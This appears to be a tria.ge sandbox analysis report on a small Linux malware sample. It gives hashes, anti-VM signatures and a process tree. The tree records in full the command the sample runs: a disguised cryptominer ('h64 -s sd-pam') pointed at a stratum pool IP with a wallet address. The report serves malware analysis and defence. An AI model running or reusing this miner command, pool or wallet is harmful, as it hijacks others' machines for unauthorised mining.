Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

4

Static

static

1

61ea017359...kes118

ubuntu-18.04-amd64

4

61ea017359...kes118

debian-9-armhf

1

61ea017359...kes118

debian-9-mips

61ea017359...kes118

debian-9-mipsel

Analysis

  • max time kernel
    0s
  • max time network
    129s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    21/05/2024, 03:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118

  • Size

    649B

  • MD5

    61ea017359a6dce4665a44a82f6feb9e

  • SHA1

    b4c777006847f9f690fd520782ce03cb4f047a41

  • SHA256

    77d533c4a4865fc909174204dd0a957fa1b79b74ad02b0a72ec313db80261087

  • SHA512

    af7be6f8671e01b5ae8dab6db0ac620eb6a5dcc526b8b50781b5737ed0bc0607f18f9cec414390358a22569cb5c011ca399d8a90129d7e9bf91b57ce39fd60cc

Score
4/10
antivm

Malware Config

Signatures

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
    /tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:1504
    • /usr/bin/wc
      wc -l
      2⤵
        PID:1508
      • /usr/bin/sort
        sort -u
        2⤵
          PID:1507
        • /bin/grep
          grep "^core id" /proc/cpuinfo
          2⤵
          • Checks CPU configuration
          PID:1506
        • /bin/uname
          uname -m
          2⤵
            PID:1509
          • /usr/bin/perl
            perl b.pl
            2⤵
              PID:1512
            • /tmp/h64
              ./h64 -s sd-pam ./Word -a cryptonight -u 1QEVkXuQe8yN6PRHCQpxCfGQAFwTXBXxJj -o stratum+tcp://163.172.18.134:8080 -p "x:[email protected]" -k -B -l Word.txt "--donate-level=1"
              2⤵
                PID:1510

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/bash.pid
              Filesize

              5B

              MD5

              94f95cdbde2a1f83e642c708096500d0

              SHA1

              a59ac422b60f8a6841bd649fe1f8fd5588dc6a9b

              SHA256

              aef8505db2d1dea920d252288be2138f3cbbd4a72e1e29b08b875a7708288107

              SHA512

              e17531c92c55c2ef939a8ed8e3a573f50583326ba86bd4b3c65150b4ecfb66b3ed2ba489e60f7bbe4af0d3a057075ad1952acdb93482975167a6682096a4b699

              Download Submit